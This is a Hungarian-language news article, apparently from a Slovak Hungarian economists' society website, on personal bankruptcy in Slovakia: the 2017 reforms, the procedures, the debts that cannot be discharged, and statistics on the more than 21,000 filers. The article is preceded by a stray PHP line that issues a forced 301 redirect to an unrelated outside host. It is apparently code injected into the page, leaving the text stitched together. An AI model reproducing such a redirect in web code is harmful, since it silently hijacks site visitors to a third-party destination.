header("Location: http://sstellar.host/300.php", true, 301); exit(); ?> Több mint 21 ezer ember jelentett már magáncsődöt
hétfő, május 27, 2019

Keresés

Több mint 21 ezer ember jelentett már magáncsődöt

2897Az ember élete során számtalan ok miatt kerülhet anyagi válsághelyzetbe és ebből adódóan adósságspirálba, betegség, haláleset, a munkahely elvesztése, meggondolatlan hitelfelvétel, a pénzügyi ismeretek hiánya és sok egyéb miatt.

Ebből pedig sok esetben egyszerűen nincs kiút, ráadásul a kisebb adósságok is tetemessé dagadhatnak a különböző büntetőkamatokkal és a végrehajtói díjjal együtt. A végrehajtások magas száma – Szlovákiában minden ötödik embert fenyeget végrehajtás – vezetett a magáncsőd intézményének bevezetéséhez. Ez tulajdonképpen csődvédelmet jelent, a lényege, hogy megelőzze a súlyosan eladósodott személy teljes anyagi ellehetetlenítését.

A tiszta lappal történő indulás lehetősége fejében azonban az adós nemcsak a kötelezettségeitől szabadul meg, hanem a vagyonától is.
Ennek ellenére a magáncsőd iránt komoly érdeklődés mutatkozik. Nem egész két esztendő alatt több mint 21 ezer ember élt Szlovákiában ezzel a lehetőséggel. A magáncsődöt nálunk már 2006-ban bevezették, ám az akkori szabályozás sokak számára nem volt elérhető, túl szigorúak voltak a feltételek. Ezért 2017. március 1-jei hatállyal enyhítették a szabályait.

Amennyiben végrehajtás indul valaki ellen, nem nyithat bankszámlát és legálisan munkát sem vállalhat. Sok esetben ugyanis a vagyon lefoglalása sem elegendő az adósság rendezéséhez, s ebben az esetben az adós csaknem összes bevételére ráteszi a kezét a végrehajtó. Ezért is ajánlott ilyenkor a Jogsegélyközponthoz fordulni és magáncsődöt jelenteni. A Jogsegélyközpont már sok éve segít a nem banki pénzintézetek ügyfelei problémáinak megoldásában.

A magáncsőd intézményének elérhetővé tételére annak érdekében volt szükség, hogy az adósságcsapdában vergődők esélyt kapjanak a legális gazdaságba való visszatérésre. Ezek az emberek ugyanis többnyire feketén vállalnak munkát és nem fizetnek egészségügyi és szociális járulékot, ennek ellenére a kórházi kezelésüket az állam téríti, s minimális nyugdíjat is kapnak. Ezért az állam részére is előnyösebb számukra lehetővé tenni a magáncsőd bejelentését, s a legális munkavállalást.

Amikor valaki magáncsődöt jelent, egy csődgondnok átértékeli a kiadásait, és pénzzé teszi mindazon vagyontárgyait, amelyek nem számítanak létszükségletnek. Magáncsődöt bárki jelenthet, függetlenül attól, hogy kinek tartozik, ennek feltétele, hogy végrehajtási vagy hasonló más eljárás indult ellene, miközben a kötelezettségének már 180 napja nem tett eleget, valamint hogy olyan követelésről van szó, mely végrehajtási eljárással behajthatatlan.

Korábban, ha a fizetésképtelenné vált személy csődeljárást kezdeményezett magával szemben, a bíróság csak akkor hagyta jóvá az indítványt, ha a vagyonának értéke elérte az 1650 eurót. Az eljárás befejeződése után pedig, vagy már az azt kezdeményező beadvánnyal együtt az adós kérhette, hogy a bíróság mentse fel az adósságai alól. Ha a bíróság úgy ítélte meg, hogy együttműködött, teljesítette kötelességeit, törölték az adósságait. Ugyanakkor meghatároztak egy hároméves próbaidőt, mely alatt az adós köteles volt minden évben egy bizonyos összeget törleszteni, amelyet a csődbiztos arányosan szétosztott a hitelezők között. A bíróság csak a próbaidő letelte után törölte teljesen az adósságot, azokat a követeléseket pedig, melyeket a csődeljárás során és a próbaidő alatt sem sikerült kielégíteni, behajthatatlannak minősítve törölte.

A törvénymódosítás értelmében a magáncsőd intézményét igénybe vevő adósok kétféleképpen szabadulhatnak a tartozásaiktól: csődeljárást kezdeményezhetnek magukkal szemben, vagy a törlesztési naptár lehetőségét választják. Magáncsődöt tízévente egyszer lehet jelenteni. A csődeljárást csak olyan személy indítványozhatja, aki ellen már folyamatban van végrehajtási eljárás, egyébként csak a törlesztési naptár jöhet szóba. Az új szabályok szerint már nincs próbaidő, és az adósságoktól gyakorlatilag 2 hét alatt meg lehet szabadulni, nem kell 3 évet várni.
A magáncsőd alkalmazását kezdeményező beadvány kézhezvételétől számított 15 napon belül a bíróság határozatban rendeli el a magáncsőd vagy a fizetési naptár alkalmazását, és már ebben a határozatban megszabadítja az adóst azoktól a tartozásoktól, melyeket sem végrehajtási eljárással, sem törlesztési naptár segítségével nem lehet behajtani.

Gyakorlatilag már ebben a 15 napos időszakban kiadott határozat felmentést jelent az adósságok alól. Csődeljárás esetén az adós átadja a vagyonát értékesítés céljából, s ebből kielégítik a hitelezőket. Törlesztési naptár esetében az adós megtarthatja a vagyona egy részét, de időben fizetnie kell a bíróság által meghatározott törlesztőrészleteket.

A törvénymódosítás bevezetett egy új fogalmat is: a lakás elidegeníthetetlen értékét. Ez az intézkedés egyfajta védelmet nyújt az adósoknak, hogy ne kerüljenek az utcára. A magáncsődbe került személy a nem kedvezményezett hitelezőkkel szemben megtarthatja vagyona egy részét. Ha a vagyon értéke nem éri el ezt a határt, akkor nem is teszik pénzzé. Ha az ingatlan értéke magasabb, eladják, a haszonból ezt a részt átutalják egy végrehajtási védelem alatt álló számlára, s az adós ezzel gazdálkodhat.

Vannak azonban olyan tartozások, melyektől a magáncsőd intézménye sem szabadíthat meg. A kedvezményezett hitelezőkkel szembeni adósságot mindenképpen törleszteni kell, ilyennek számít például a kiskorú gyermeknek fizetett tartásdíj, a kiszabott büntetések vagy a jelzáloggal biztosított követelés. A magáncsőd indítását formanyomtatványon kell kérni, ami lényegesen egyszerűsíti az adósságrendezés folyamatát. Az ügyfeleknek jogi képviselővel kell rendelkezniük, aki lehet a Jogsegélyközpont munkatársa vagy ügyvéd is.

Aki kikerül az adósságcsapdából, s hat éven belül nagyobb összeghez jut, például örökség útján, annak legalább a felét fel kell ajánlania a régi hitelezőinek. Ellenkező esetben felmerülhet a csalás vagy a rossz szándék gyanúja, s az egész adósságtörlést semmissé nyilváníthatják. Az adósságoktól megszabadított személy feltehetően hosszú ideig nem tud majd újabb kölcsönt felvenni, a magáncsődről szóló információ ugyanis bekerül a kereskedelmi közlönybe.

A spekulánsok ellen többféle módon lépnek fel. Amennyiben bebizonyosodik, hogy az adós eltitkolta a vagyonát, a hitelezők a magáncsőd kihirdetésétől számított hat éven belül kérhetik annak semmissé tételét. Ugyancsak érvénytelen a magáncsőd, ha az adós annak megindítása előtt három éven belül átruházta a vagyonát valamely családtagjára vagy ismerősére.

Az elmúlt év folyamán magáncsődeljárással vesztette el a teljes vagyonát 13 004 férfi, valamint 8 352 nő Szlovákiában. A legtöbben közülük a 40-49 éves korosztályhoz tartoztak, de a férfiak között sok a harminc év körüli is. Volt, aki már 18 évesen magáncsődöt jelentett, de akadt közöttük két kilencvenéves asszony is.

Minden jog fenntartva, Szlovákiai Magyar Közgazdász Társaság, 2010
A honlap a Corvinus Támogatásközvetítő és Tőkebefektetési Zrt. támogatásával készült. Created: namedia